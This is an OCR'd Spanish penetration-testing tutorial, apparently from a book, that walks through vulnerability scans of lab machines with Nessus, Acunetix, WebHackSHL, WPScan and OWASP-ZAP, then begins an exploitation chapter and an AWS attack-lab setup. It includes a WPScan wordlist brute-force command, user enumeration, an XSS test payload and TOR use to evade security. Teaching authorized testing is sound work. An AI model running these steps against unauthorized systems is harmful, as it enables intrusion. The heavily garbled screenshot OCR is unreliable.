A armasi fepcns 


$ 
Aquí es donde iniciaremos los escaneos, para 
iniciar uno, basta con hacer clic en el botón azul a 
la derecha, y seleccionar el tipo de escaneo que 
queremos realizar, estos son modelos de escaneos 


para diferentes tipos de sistemas, son muy útiles, 
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pero están compuestos de módulos, y como tal, tu 
podrías crear uno propio en base a tus 


necesidades con la primera opción. 


Sean Templates 


t maik to Ses 


Scanner 
p A 6 he 
has $ A > ¢ 
Advanced Sean Audit Cloud Infrastructure Badlock Detection Bash Shellshock Detection Basic Network Sca 
re ioan hve wo ii eoe iA OFENSA IRAT EAEE pe ion A 






FOSA ety od aa wie-cliy 


Ge ü a 9 


Host Discovery Intel AMT Security Bypass Internal PC! Network Scan Malware Scan MOM Confia Aud 
KaRa Wact tr: ae $ t ‘ i ua « ii Nye 2 Jerte een PEE > Ms EDAP i rrilean Ses! . trp that od mh 


| Na E s © E 
ä 4 
PCI Quarterly External Scan Policy Compliance Auditina SCAP and OVAL Auditina Shadow Brokers Scan Spectre and Meltdo 
e , ` , ah PEA A ng AF and TAS 3 A ne NiS Bente Ve eee ite Gye 
MA eer: mean meat a ne man pea 1 i or E ` SACA ÓN poo, 2 





Vamos a decir que queremos escanear dos 
sistemas en una red interna y buscar si tienen 
vulnerabilidades, para esto, seleccionaremos un 
escaneo básico (basic network scan), que busca lo 
más común en todos los sistemas, junto con 
reconocimiento activo. Este escaneo, como puedes 


ver, te permite escanear a varias IPs al mismo 


tiempo, y te permite escanear tanto sistemas 


locales como globales, como el ejemplo de la 


página de nmap. 
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New Scan / Basic Network Scan 


¢ Back to Scan Templates 


Al hacer clic en el escaneo, podemos ver el 


avance, junto con la información que va obteniendo 


Settings Credentials Plugins D> 
Basic = de cada activo escaneado. Como puedes ver, tiene 
Genera ware a, q z rge ili 
y | - un rango de qué tan crítica es una vulnerabilidad 
Schedule ul 
Description red interna 


Rotfcators 


que te debería de recordar al CVSS. 








DISCOVERY = == 
ASSESSMENT Folder | My Scans . > 
REPORT Pt A F my ih Scan Detd 
ici : Targets 192.168.1,141, 192.168.1.130, scanme.nmap.oral at 
| as 





Upload Targets Add File 


Saye E Cancel 


Para ver detalles, hacemos clic en el activo que 


Ahora hacemos clic en “save” (grabar), y en la , 
queremos ver, y nos mostrará detalles de la 


antalla principal nos aparecerá este escaneo ya | : 
P ie fi á información obtenida. En este ejemplo, nos dice en 


confi | i 
onfigurado, debemos hacer clic en la flecha para la parte derecha que es un Windows 7 Home, su 


iniciar el escaneo. q la 
IP, dirección MAC, y nos dice que tiene dos 


My Scans 


vulnerabilidades críticas y algunas otras de menos 
heer) see 


gravedad, las vulnerabilidades criticas son las que 


mas nos interesan 
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Escaneo / 192 168,1141 
: = — 5 A 
Vulnerabilities H 
to 14517-010: Security Update for Microsoft Windows SMB Server (401 3389) (ETERNALBLUE) (ETERNALCHAMPI 
$e hire : z 
ae taz - = 
ES LSSI ready DNS Fazchutes Lodo Atte Senone Case econ TEA e HO Aeae ia 
MSTA EE Secs Lips te Aerosol Ward AE Serial EEEE EEN ETEEN ATRN aras i > ae dons host is affected by the following yuinerabilities : 
i CA L fansi parteras AR oa : ug 
E vis seria aen iu oa b> me code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMEy1) due to improper handling of certain requests, An 
pb _ 4 emote attacker can exploit these vulnerabilities. via a specially crafted oacket. to execute arbitrary code, (CVE-2017-0143, CVE-2017-0144, 
Se Mito A) et Ups te SAV arg GAD Sa Picco TN Etc ceed chad) Witos a E 
: Mo = EyE-2017-0146, CVE-2017-0148) 
E 2 Suegras a 
E i 
E oieee Kieder an disclosure vulnerability exists in Microsoft Server Message Biock 1.0 (SMBv1} due to improper handling of certain requests. An 
z Nasas Ei sorri ] 4 remote attacker can exploit this, via a specially crafted packet, to disciose sensitive information, (CVE-2017-0147) 
= i E E 7 y POR RSS 5 Aaii 
Mzorh Wesert S49 farce Dsteción ae i 


E ETERNALCHAMPION. ETERNALROMANCE. and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed 
1 nya group known as the Shadow Brokers, WannaCry / WannaCrypt is a ransomware program utilizing the EJERNALBLUE exploit, and 
ayom that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in 
eand then spreads via ETERNALBLUE. 


Ya que nos interesan las vulnerabilidades criticas, 
veleased a sat of patches for Windows Vista, 2008, 7, 2008 RZ, 2012, 8,1, RT 8,1, 2012 R2, 10, and 2015, Microsoft has also released emergency 
do s operating systems that are no longer supported, including Windows XP. 2003, and 8. 


haremos clic en una de estas para ver que nos 


muestra. Como podemos ver, en la pantalla 


d Wine gws operating systems, e.g. Windows XP. Microsoft recommends that users discontinue the use of SMBw1, SiByl lacks security 

sere included in later SMB versions. SMBy1 can be disabled by following the vendor instructions provided in Microsoft KB2690547, 

JG-CER recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices, For SMB over the NetBiOS API, 
44 137 / 139 and UDP ports 137 / 138 on all network boundary devices. 


| principal nos muestra una descripción de la falla, 
posibles soluciones, y algunas ligas con 


documentación. A 
Sin embargo, como pentester, me interesan un 


poco más las referencias que se muestra en la 
parte a la derecha, ya que me muestra en que 
afecta a la seguridad en base al CVSS, si existe un 
exploit que pueda atacar a esa vulnerabilidad, que 


herramientas tienen ese exploit, y el CVE, que si 
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Plugin Details 


Severity 
ID; 
Version. 

| Type: 
Family: 
Published 


Modified: 
















2 TE SUIT 
7 WHITES PIED 


hago clic en este último, me llevaría a una página derecha “export” dentro de un escaneo, y 


donde podría encontrar todavía más posteriormente elegir en qué formato quieres que 
documentación de cómo funciona y cómo se se exporte, a mi particularmente me ha sido muy 


explota esta vulnerabilidad. 


útil el formato HTML ya que es fácil de mover y 


PS ls leer, sin embargo, dependerá de ti que formato te 
i : Exploitable With 
Risk Information ; 
wisi ee 3 sirve mejor. 
97833 Risk Factor; Critical ee mA eile “ama mon 
Windows Kerne! Pool Corruption) 
1.18 CVSS Base Score: 10.0 ee 
CA Was U 
remote 





CVSS Tempora! Score: 3,7 


Window T wee ALAS A j j 
del CVSS Vector: CYSSZ2BAVIN/ACL/AUNIOC I C/AC 


Core impact 


Configure Audit Trail Launch + Export Y 


March zt 2017 $ sra , pp = 
CVSS Temporal Vector, CVSS28E4/RUOF/RCC 
july 16.2018 : 
z IAVM Severity: | Reference Information 


En ei reporte, te mostrará de forma mas facil de 


EDB-ID: 41891, 41987 exportar y mandar, un documento en el cual te dara 
MSFT: MS17-010 
BID: 96703, 96704, 95705, 96706, 98m 
IAVA: 2017-A-0085 | 
MSKB: 4012212, 4012213, 40122144) 
012216, 4012217, 4012606, 401310 
12598, 4012212, 4012213, 4012204 


4 EE 44943 IAA SRA Aan $ 
12210, LU 2217, 4072606 6613108 


Vulnerability Information 


los detalles de las vulnerabilidades de cada activo 


PE: chevo:microseftwindows que hayas auditado, esto te sera muy util para 
Exploit Available: true 
Expiow Ease: Exploits are available 


preparar los entregables al cliente final. 


ie 
rra ETA 
Nessus ES 


hs 


Patch dub Date: March 14. 2917 


ES >) & La la Em 
E Ge O QOG 


12592 
Vulnerability Pub Date: March 14 2017 VE: CVE-2017-9143 CVE-2017-014R Escaneo 
' 145, CVE-2017-0146, CVE-2017 010% mes 
in the news: true nee ] 
to TABLE OF CONTENTS 


Horts Executive Summary 
> 1S) 144 ti 
Rapa 


© ZAS 


Hosts fxecutive Suma! y 


Adicionalmente, en la fase de reporte, 


192.168.1.130 


especialmente en la ejecutiva, es de gran ayuda la 


función de exportación de esta herramienta. Para 





utilizarla, basta con usar el botón que está a la 
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Acunetix 


Acunetix es un escáner de vulnerabilidades de 
aplicaciones web. La herramienta está diseñada 
para encontrar agujeros de seguridad en las 
aplicaciones web de la organización que un 
atacante podría aprovechar para obtener acceso a 
los sistemas y datos y nos ayuda a documentar los 
reportes en diferentes estándares como ISO 
27001. 

Iremos a descargarlo la versión de 14 días en la 
siguiente ruta: 


httos://www.acunetix.com/vulnerability- 
scanner/download/ 


234 











WHITES 








WHITE SUIT 








@ Secure | https /www.acunefoccom 


| Bea 


+ a a ier mpr aR 2 seil address. 
download iak will be sent to you via email so ensure you enter g vold emos GAGTESS 
atr A ALO f TERN PS E UU j 


aner fist Name 
pater Las! Name 

ter Compa W Name 
E Phone IR 
£ a e-Mail Address 


yma Software Reseller 


Llenamos los campos para poder descargarlo e 


instalarlo. 
Una vez instalado lo ejecutamos y Se nos abrirá en 


nuestro localhost un servidor de Acunetix en el 


puerto 13444, o sea, en https: //localhost: 13444 


Para realizar un nuevo escaneo agregaremos un 


Target para así después darle clic donde dice New 
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M 5 © aAcunetix- Dashboard X + Y 


1 PERIE a focathost:13-442/#/dachbos Ww t= 


El escaneo se empezará a realizar y una vez 










concluido nos mostrará las posibles 
acunetix vulnerabilidades que tiene el servidor web 
escaneado. 


Nota: Los escaneos suelen tardar algo de tiempo 





Ea Dashboard 


consume mucho ancho de banda. 








Scan y ahí poner la URL de la página web que 






lar dde 
TA 


queremos escanear 





Add Target 
Una vez finalizado el escaneo nos arroja las 
= — ] posibles vulnerabilidades las cual hay que validar a 
> mano, para así pasar a la fase de explotación en 


Description 


i = =- | Un Pentesting. Acutinex, a diferencia de Nessus, se 


| 
| 
| 





ra | | especializa en aplicaciones y paginas web, 
entonces tiene algunas ventajas en estas areas, en 
este caso, reporta desde para cumplir ciertos ISOs, 
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Scan Stats & info Vulnerabilities 


hasta de acuerdo con OWASP top 10, puedes 


hacer clic en la pestaña de vulnerabilidades para 


ver las vulnerabilidades. 


Site Structure 


| Se Vulnerability 


Oooo eee eceeeeesscseeceseseeses & 


Cross site scripting 

WordPress ‘get_edit_post_link{}' and ‘get_edit_co... 
WordPress 'press-this.ghp' Multiple Csoss-Site Scri... 
WordPress 'press-this.php' Remote Security Bypas... 
WordPress 'templates.php' Cross-Site Scripting Vul.. 
WordPress 'vep-admin/admin,php' Module Configu.. 
WordPress ‘wp-admin/options.php' Remote Code ... 
WordPress 'wp-db.php' Character Set SOL Injectio... 
WordPress 'wip-register.php' Multipie Cross-Site Sc.. 
WordPress 2.0.1 Denial of Service Vulnerability (0.6... 
WordPress 16.2 Username Remote PHP Code injec... 
WordPress 2.6.3 Multiple Unspecified Security Vuln... 
WordPress 2.6.5 Charset Decoding SQL injection Yu... 
WordPress 2.0.5 Cross-Site Scripting Vulnerability (... 
WordPress 2.6.5 Invalid CSRF Token Cross-Site Scri... 
WordPress 2.0.8 'Zend_Hash_Del_Key_Or_Index' S.. 
WordPress 26.9 Multipie Vulnerabilities (2.0 - 2.0.9) 
WordPress 2.3.2 Post Edit Unauthorized Access Vul... 
WordPress 2.3.3 Directory Traversal Vulnerability (0... 
WordPress 2.5 Cookie integrity Protection Unautho... 


WordPress 2.6.1 Lost Password SQL Column TANC. 


Evenis 


URL 


http://192,168,1.68/ 


http://192.162.1,62/ 
http://192.168,1,60/ 
http://192.168,1,68 
http://192.166.1.69/ 
http://192.168.1,69/ 
http://192,168,1.68/ 
htto//192.168,1.68/ 
http://192,158.1.68/ 
http://192.168,1,68/ 
http://192.168,1.68/ 
nttp://192.168,1.68/ 
http://192,168.1.68/ 
http://192,162.1,62/ 
http://192,158.1.68/ 
http//192,168,1,68/ 
http://192.168.1.08/ 
http://192.168,1,68/ 
http://192,168,1.68/ 
htto://197,168,1,68/ 


httpy//192,168.1,68/ 
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È Back Stop Scan 
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Y al hacer clic en una de ellas, te mostraria lo que 
cualquier analizador de vulnerabilidades: 
descripcion, detalles del ataque, impacto, 
recomendaciones, documentación, etc. en donde 
puedes tomar el CVE o CWE o el número del 
OWASP top 10, dependiendo de la vulnerabilidad, 
para buscar como explotarla. 


Así como Nessus, Cross site scripting 


* Vulnerability description 
¥ Attack details 


también tiene un 
apartado donde puedes 
generar reportes en el 


boton “Generate Report”, Y HTTP request 


y puedes hacerlo en base ¥ The impact of this vulnerability 


a tus necesidades, tal * How to fix this vulnerability 
como un reporte 
ejecutivo, o OWASP, o 


algun ISO en particular. 


Classification 
Y Detailed information 


Y Web References 


Generate Report WAF Export... + Group By: None v 


o a a 
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Senerate Report tal como Nikto, WPScan, Joomscan y, además, 
tiene implementaciones de TOR para mantener un 
nivel de anónimo si es que es requerido. 

Para utilizar la herramienta, basta con abrirla de la 
carpeta lopt/AVIWebHackSHL 


_Y posteriormente ejecutar el comando con los 


Template 


Standard Reports 





Developer 


| 


Executive Summary 
Quick 





comandos chmod +x webhackshl.py y 


_ .¡webhackshl.py 
AV /WebHackSHL# ./webhackshl.py 






En el reporte aparecerán las fallas que encontró la 
herramienta. 





Executive summ : : : ' 
ay Al ejecutar el script, te aparecera un menú, en el 


podrás elegir qué es lo que quieres hacer, tiene 


Alert group - 
Cross site scripting | Severity Alert col nl 

p ; - s = a h . . r . 
Blind SQL Injection Ho y muchas aplicaciones muy útiles, como encontrar 
SOL injection High 3 | f š su 
i | l High 2 fallas en XSS y SQLi, algo que seria muy útil, O 


encontrar el panel de control, o evadir seguridad en 
páginas web. La opción d es la que te servirá para 


realizar análisis de vulnerabilidades en una página 


Otros analizadores de vulnerabilidades 


Webhackshl es otra herramienta de análisis de 
vulnerabili icaci 

abilidades para aplicaciones web, su veb. 
funcionamiento es muy sencillo, a diferencia de 
Acutinex o Nessus, en si funciona al llamar a varios 


analizadores de vulnerabilidades de código abierto 
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otras, en las que hay tres opciones, si estás 
analizando una página web hecha sin algún CMS, 
elige la opción b, ya que NIKTO te ayudará a 
realizar un análisis de vulnerabilidades de esta, sin 
embargo, si la página web está desarrollada con el 
CMS WordPress, utiliza la opción e, y si el CMS es 
Joomla, utiliza la opción c, las variaciones de estas 
en las opciones d y f simplemente agregan TOR, 
una tecnología que te mantendrá anónimo mientras 
realizas los analizadores, solo usa esas opciones si 
estás buscando evadir un sistema de seguridad o 


si el trabajo exige ser anónimo. 


Para este punto deberías saber que opción te 


conviene usar si hiciste un buen reconocimiento, de 





forma que sabrás con qué tecnología fue 


l dl y construida una página web. 
Luego de seleccionar la opción d, tendrás algunas 


opciones más para realizar análisis de | 
vulnerabilidades. La opción a te daría información 
similar a la que esperaríamos encontrar en la etapa 


de reconocimiento, así que nos enfocaremos en las 
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Selecciona: d 
Seleccina una de las siguientes opciones: 


a) 
D 

C) 
q 
e) 
f) 
g) 


— 


Obtener informacion del sistio web, servidor, Ip, CMS, Software del servidor y 


Buscar vulnerabilidades web usando nikto. 

Buscar vulnerabilidades web de sitios web Joomla, 

Buscar vulnerabilidades web de sitios web Joomla usando TOR. 

Buscar vulnerabilidades web de sitios web con WordPress 

Buscar vulnerabilidades web de sitios web con WordPress usando TOR. 
Salir. 


Introduce tu opcion: 





+ Target IP; 
+ Target Hostname: 


En este ejemplo, elegi Nikto para realizar un 
escaneo contra una pagina, puedes esperar una 
respuesta similar a esta en la terminal, en la que 
tienes que buscar las vulnerabilidades en los 
renglones, como te das cuenta, esta herramienta 
no es tan “bonita” como las de paga, sin embargo, 


también es bastante efectiva. 


192,168,1,68 
192,168.1.68 


+ Target Port: 90 


+ Start lime; 


+ Server! 


2018-07-26 02:10:40 (GMT-5) 


Apache/2,2,14 (Ubuntu) mod mono/2.4.3 DHP/5.3,2-lubuntud,30 with Suhosin-Patch proxy htol/3,09,1 mod python/3.3.1 Py! 


mod ssl/2.2.14 OpenSSL/0.9.8k Phusion Passenger/4.0.38 mod pert/2.0,4 Perl/v5.10,1 
+ The anti-clickjacking X-Frame-Options header 15 not present. 
+ The X-X5S-Protection header is not defined. This header can hint to the user agent to protect against some forms of X55 


+ The X-Content-Type-Options header is not set, This could allow the user agent to 


n to the MIME type 

+ No CGI Directories found (use '-C alt’ to force check all possible dirs) 

+ Retrieved x-powered-by header: PHP/5,3,2-lubuntud 30 

+ OpenSSL/0,9.8k appears to be outdated (current is at least 1.0,1}). OpenSSL 1.6.90 and 0.9,82c are also current. 
+ Perl/v5,10,1 appears to be outdated (current is at least v5. 14.2) 


+ Apache/2,2.14 appears to be outdated (current 1s at least Apache/2.4.12). Apache 
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render the content of the site in a differe 


2.0.65 (final release) and 2.2.29 are also 


= 














PI 


Análisis a páginas WordPress 


Otra de las opciones que aparecen en webhackshl, 
sin embargo, que vale la pena aprender a utilizar 
por sí misma, es WPScan, esta es una herramienta 
escrita en Ruby diseñada específicamente para 
realizar análisis de vulnerabilidades a páginas 
hechas con WordPress. 

Para utilizarla, basta con escribir wpscan en la 


terminal. 


:/# WMpscan 


Similar a nmap, debemos de ponerle parámetros 
para que nos dé alguna respuesta útil, digamos 
que queremos hacer un escaneo general a una 
página, utilizamos el parámetro -u, de forma que el 


comando completo sea wpscan -u <página web> 


‘/# woscan -u http://192,168,1.68/worapress 





Después de esto, nos mostrará los resultados en la 





terminal, tales como información del servidor y del 


sistema. 
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Y finalmente, plugins encontrados, y si existe 


+) Interesting header; SERVER: Apache/2.2.14 (Ubuntu) mod mono/2.4.3 PHP/5,3.2-lubuntu4.30 with Suhosin-Patch proxy html). 
10/3,3.1 Python/2.6.5 mod ss1/2.2.14 OpenSSL/0.9. 8k Phusion Passenger/4.0,38 mod pert/2.0.4 Pert/¥5.10.1 i 
i+] Interesting header: STATUS: 200 OK “aa 
Interesting header: X-POWERED-BY: PHP/5.3,2-lubuntud.38 alguna vulnerabilidad en estos. 
XML-RPC Interface available under: http: //192.168.1.68/wordpress/xmlrpc. php (HTTP 200] A ains (ro passive detection 
+) Found an RSS Feed: http://192.168.1,68/wordpress/?feed=rss2 [HTTP 200] we a 


Detected 1 user from RSS feed: 

4 age . r s ' lary 

Version y vulnerabilidades en la version de e n o a content /atuatns/anoatteny? 
an nttp;//192. 168. 1.68/wordpress/wp-content/ptugins/myqallery/changetog, txt 

ry listing is enabled; http;//192,168,1,65/wordpress/wp-content/plugins/myaallery/ 







a not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manu 


ton. 


WordPress instalada, y si ha habido 
gallery <= 1.4b4 - Remote File Inclusion 


actualizaciones que resuelvan dichos problemas. 
https: //wpvulndd, com/ vulnerabilities /6506 


Includes directory has directory listing enabled: http://192.168.1.68/wordpress/wp-includes/ l 
»: httos://mww.explo1t-db.com/exploits/3814/ 







Enumerating WordPress version ... 
The WordPress 'http://192.168.1.68/wordpress/readne.html' file exists exposing a version number 


Como podrás notar, al igual que otros analizadores 





) WordPress version 2.0 (Released on 2007-09-24) identified from advanced fingerprinting, meta generator, | 
15 vulnerabilities identified from the version number vo ; 
de vulnerabilidades, nos da referencias y ligas 


Title; Wordpress 1.5.1 - 2.0.2 wp-register.php Multiple Parameter XSS l 
Reference; https: //wpvulndb.com/vulnerabilities/6033 donde podemos investigar cómo funcionan y cómo 


Reference: httos://cve.mitre.org/cgi-bin/cvename, cgi?name=CVE-2007-5105 
Reference: httos://cve.mitre,org/cgi-bin/cvenane. cgi?name=CVE- 2007-5106 explotarlas. 
Fixed in; 2,0.2 


Temas, y si estos temas están desactualizados y Adicionalmente, WPScan tiene algunas otras 





existe alguna vulnerabilidad en estos. funciones, tales como encontrar usuarios, hacer 


+] WordPress theme in use: default - v1.5 ataques de fuerza bruta, directorios, y utilizar 





Name; default - v1.5 
Last updated: 2010-06-14700:00; 00.0002 proxys, puedes ver estos comandos extras con el 


Location; http://192.168.1.68/wordpress/wp-content/themes/default/ 


The version is out of date, the latest version 1s 1.7.2 comando w J 
Style URL: http://192. 168. 1.68/wordpress/wp-content/themes/default/style.css pacan h 
Theme Name; WordPress Default . z 
WordPress Defau Aqui te pongo algunos de los mas comunes/útiles. 


Theme URI: http://wordpress.org/ 
Description: The default WordPress theme based on the famous <a href="http://binarybonsai.com/kubrick/”> 


Author: Michael Heilemann 
Author URI: http://binarybonsal.com/ 
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wpscan -u <página.com> --enumerate p 












wpscan -u <página.com> --enumerate t 






wpscan -u <página.com> --enumerate u 












wpscan -u <página.com> --wordlist 


<lista> --username <usuario> realizar ataques de 


Análisis OWASP a páginas web 


OWASP-ZAP es la herramienta de análisis de 
vulnerabilidades creada por OWASP, que hace 
escaneos en base a sus estándares de seguridad 
en aplicaciones/páginas web. 

Esta herramienta es multiplataforma y puedes 
descargarla en casi cualquier sistema entrando a 
https://www.owasp.org/index.php/OWASP Zed Att 
ack_Proxy Project , sin embargo, en el sistema 
que estamos utilizando (Kali), ya está instalada por 
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de los plugins instalada: 


Este comando te da T 


de los temas instalados 


Este comando te da una 
de los usuarios de la pág 


Este comando te permit 


diccionario a la pagina, 















Perris 


default, asi que basta con escribir el comando 


owasp-zap en la terminal. 


'/# owasp-zap 





la 


Afortunadamente para quien no sea tan amante de 















la terminal, esta es una herramienta con interfaz 
gráfica, así que es sencillo de entender. Una vez 


abierta, basta con introducir la dirección web de la 





página que queremos analizar en la barra de 









búsqueda, y presionar el botón “Attack”. 


sheet Bas trios Eso e = = = —_ cn 


MS f= O O hd. 4*? OKERE vs  . E iE: Stes 











@ Welcome to the OWASP Zed Attack Proxy (ZAP) 


| Ts? ae easy real penita lasting taal Be fring váraabllties n weh spplcabicrt 
i 







tu th part the session mith nama based on the Current MEATS mayia ye zaza that qua should only ack picas that you have been specficaly been green perrazes to test 
; y 

IEA ene e Leen pan PS RE Tn To quickly teat an application, enter is URL below and grew Altar, 

CE wet to peras the sestion at this moment it rE 

Saber mychoce rd donot ak megan. jp AL to tock 

Ey tina change your decos va the Opbora / Database seres 


q ur 


dan de 
ES 
—— 
nd = 








‘btn 





Ena Bar 


Esta acción hará que el programa corra un 
escaneo estándar de la aplicación/página web que 
estés analizando, en la parte inferior notarás 
algunas pestañas, estas están haciendo varios 


trabajos importantes, el primero, es el spider, que 
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£ ae AJAX Spider 
P| 3% Break Points 


está indexando todas las páginas en el sitio y los 


métodos que acepta. 


History |S Search | PE alerts | Output Aspeni E| 














Serer =- —= i i 
j Phew i Progress. O: http W192. 168.1-6tnerdpress 8 A Dz a a Y Current Scan URLS Found:S8 hisy :/ td] Clients 
eS _—— AA == yu rowse 
Processed MM Method 2 \UR SSS =. y Forced E 

ct POST http-i/192.168.1.68/wordpress/wp-comments-post.php 

E GET http-//192 168.3 68/wordpressfieed=15526p=1 ig! Fuzzer 

a GET http:1/192-168.1.58/wordpresswp-traciback phpip=1 


— HTTP Sessions 

| Params 
WebSockets 

cs Zest Results 


Al terminar el análisis, irás a la pestaña de alertas, 


en donde encontraras vulnerabilidades del 





VE 


sitio/aplicación web analizados y detalles de cada Al terminar el análisis, querrás exportar tus 


una, así como su gravedad (como has visto en resultados en el formato que más te sirva. De 


otros analizadores de vulnerabilidades) y en base a nuevo te repito es de acuerdo con tus necesidades, 


eso empezar a planear un ataque contra el 


A search | alerts | output | spider | Y Active Scan 


Cross Site Scripting (Reflected) E 
URL: http://192.168.1, 68/wordpress/wp-req 
Risk: M High a 
Confidence: Medium 3 
Parameter: user_login 

Attack;  “=<script>alert(1);</script> 
Evidence: “><script>alert(1);</script> 
CWEID: 79 

WASCID: 8 2 
Source; — Active (40012 - Cross Site Scripting (Ref 


yo en general el HTML se me hace un formato que 





* History 
08 Z 
Y 5 Alerts (7) 

» “Cross Site Scripting (Reflected) (2) 
» © Buffer Overflow 

+ Fl Directory Browsing 

» F X-Frame-Options Header Not Set (17) 

» F Private IP Disclosure (4) 

> $3 Web Browser XSS Protection Not Enabled (19) 
» $ X-Content-Type-Options Header Missing (27) 


objetivo. 


va de acuerdo con lo que necesito. 






Sua Tools Online Help 






Eile Edit View Analyse 













Generate HTML Report... 
Generate XML Report... 
Generate Markdown Report... 
Generate JSON Report... 
Export Messages to File... 


"Oo a Export Response to File... 
5] Default Context | 


| sort All URLs to File... 
> @ Sites Export All URLs to | 
Export Selected URLs to File... 
Export URLs for Context 


Compare with Another Session... 


Standard Mode ¥| | | | 


— - 

























Adicionalmente, puedes agregar más pestañas 





para hacer otros tipos de análisis, por ejemplo, 








fuzzers que te permitirán encontrar URLs donde 





hacer inyecciones, entre otras cosas. 
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Ahora esta herramienta y todo el tema de OWASP Explotación 


es bastante más complejo, así que te conviene que 


cheques un poco más de las opciones que tiene Esta es la fase en la que vamos a comprometer a 


para escanear, pero incluso utilizado varios sistemas de información. Existen muchas 


superficialmente es una herramienta bastante útil formas de explotación, desde los RATs (Remote 


Access Trojan), que te permitirán tomar control 


para encontrar fallas en base a los estándares 
OWASP. 


remotamente de un sistema, hasta los exploits, que 
te permiten entrar al sistema por medio de un error, 
usualmente necesitas utilizar una combinación de 
varias técnicas para realizar una prueba de 


intrusión exitosa y completa. 


OWASP ZAK 


Ataques fuera de la red local desde la 
nube 


Lo primero que tienes que saber, es que, al querer 





comprometer a un sistema, generalmente 
necesitamos tener o poder establecer algun tipo de 
comunicacion entre el sistema comprometido y el 
sistema, y por lo tanto, las direcciones IP de ambas 
máquinas deben de poder comunicarse, es decir, si 
estas en una red LAN, debes estar en la misma red 
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A: ES 


LAN que el objetivo, de lo contrario, debes tener 
una IP global, o WAN, a la que la IP LAN del 


objetivo pueda comunicarse. 


En tu computadora y en red doméstica, no tendrás 
acceso rápido y sencillo a una IP global, ya que 
aunque tu router tiene una IP global, y podrás 
acceder a esta para realizar ataques por medio de 
port-forwarding, no lo recomendaría, debido a que 
es tedioso y no es compatible con todos los 
routers, si se reinicia o apaga tu router podría 
cambiar tu IP o perder comunicación con el 
objetivo, y la única manera de realizar ataques 
sería dentro de esa red, por lo tanto, yo sugiero 


algunas otras alternativas. 


Amazon Web Services 


Amazon Web Services, o AWS, es uno de los 
servicios de computación en la nube más grande 
que existe, a pesar de que es el servicio con el que 
me siento más cómodo, no significa que sea el 


único y mejor (dependiendo a quien le preguntes), 
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o mas barato, ya que existen Google Cloud, Azure, 


y DigitalOcean en los que podrías hacer las 
mismas cosas. Sin embargo, aquí mencionare 
como configurar tu laboratorio en la nube de forma 
que puedas realizar ataques remotamente desde 
cualquier lado, hasta desde un celular. 

Primero, entra a https://aws.amazon.com y crea 
una cuenta. 


Producti + i) bring Larnsg uted RE AWS Maita Dag Qatamen Poten Mur + 


Amazon SageMaker 


Batch Transform 


KDA time Dala sel 





Después que hayas pasado por el proceso de crear 
una cuenta, te encontrarás con una pantalla en la 
que harás clic en la pestaña de “Services”, y veras 
los principales servicios, el que nos interesa por el 
momento es el que se llama EC2, haz clic en ese. 
Adicionalmente, vale la pena que hagas clic en la 


pestaña de tu usuario en la derecha, donde podrás 
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observar tus costos/pagos, número de cuenta, 


entre otros detalles. 
aws 





| History 


| Console Home 


Billing 
Amazon Lex 


Amazon Polly 


| 
| 
| 
| 
i 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 


Resource Groups ~v 


(0) 


[ej 





H A c t y 






Compute 


EC2 
Lightsail Y 


Elastic Container Service 


EKS 

Lambda 

Batch 

Efastic Beanstalk 


storage 


$3 

EFS 

Glacier 

storage Gateway 


Una vez dentro de EC2(Elastic Compute Cloud) 


veras una pantalla similar a esta pantalla, hay 


algunas cosas que debes de entender antes de 


poder operar una computadora en la nube para 


realizar pruebas de penetracion. 
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tues Amato Ea Hee US EA Bole 








14 Pablo Cefater > po. ‘upped 


@  Ascount Attrinutas 
Bore iS 
ye a 


CHG 


Pos DARIA 





Sonica Hegilh O Ssheciled Eyeats 


Service Stats” US Emm jone 


Us Eas DM! Ni ers 
Des ser? S A 


4 


Arakata Zone Setas: 


weet et 


Y 
binii tore soporte orri, 


9 


eari 
AE E 


y” 


En 
HALA Dd IO 


Saves rt 


Información personal 


Hay algunas cosas que 
debes saber de tu propia 
cuenta para utilizar 
adecuadamente AWS, para 
esto, vas a requerir irte a la 
sección “My Account” abajo 


de tu usuario. 
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xj Ajd infotraton 


ES 


e ANYS Matkelp'ace 


RE PP 


Ry 

Stag tang $ casan ty ioa 
(Ai ney > 

Wa diles 


My Account 
My Organization 
My Billing Dashboard 


My Security Credentials 


Sign Out 





i 
$ 
i 
| 
j 
$ 
| 
i 
f 


AAA NN pr A pm 






























Como puedes ver, aquí puedes ver mucha 
información de tu cuenta: de pago e información 


personal. 
Dashboard 


Bills 


Pon atención a donde dice Cost Explorer 


“account settings”, aquí notaras un Budgets 
número que es el “Account ld”, Reports 
cuando menciona “Account ld” o 
AWS Account Number, a esto me 
refiero, ya que te sirve para 


acceder a algunas funciones de tu 


cuenta tal como compartir Preferences 
instancias y AMls. Credits 
Tax Settings 


~ Account Settings 


Account ld: b 
Seller: AWS Inc. 
Account Name: Pablo Gutierrez 
Password: ** 
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Cost Allocation Ta 
Payment Methods 
Payment History 
Consolidated Billin 


a 4 E 


Regiones 


Las instancias en Amazon están divididas por 
“regiones” y tú puedes tener activos corriendo en 
diferentes regiones al mismo tiempo, sin embargo, 
cada región tiene un límite de activos utilizables por 
cuenta, así que toma eso en cuenta. La región se 
refiere a donde está el servidor de Amazon que te 
está dando el servicio, naturalmente te conviene 
utilizar el servidor más cercano, para seleccionar la 


región basta con hacerlo en el 


Pablo Gutierrez y 


botón a la esquina superior 


derecha. US East (N. Virginia) 
| US East (Ohio) 
US West (N. California) 
Instancias 


Las instancias son los sistemas con los que inicies, 
pueden ser de diferentes sistemas operativos como 
Linux y Windows, y pueden tener o no interfaces 
gráficas, estas generalmente tienen dos estados, 
apagada y prendida, y si quieres borrarla, deberás 


usar “terminate” para eliminarla de tu consola de 
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instancias. en esta consola, accedida por el menú a NR — 


la izquierda, podrás ver las instancias que tengas e 
apagadas, prendidas, y sus detalles, tales como la E on nt encanta ean 
llave con la que se accede al sistema, sistemas de a , 
monitoreo, sus IP internas y externas, y que tipo de 


Instancia ad Llaves (Key Pair) 





QF s Al crear una instancia, deberás crearla con una 
Nese - iuas lO lustance Type = AveilsbiityZone- Instance Suis a Simus Chachy Alarm Sutas Pitic BNSP) ~ IPrtEibicP Pob Pe i eT) 

ETE one llave, llamada en Amazon “key pair”, que es una 
ted ¡TEA Voin usassble ds is Y . pema z 
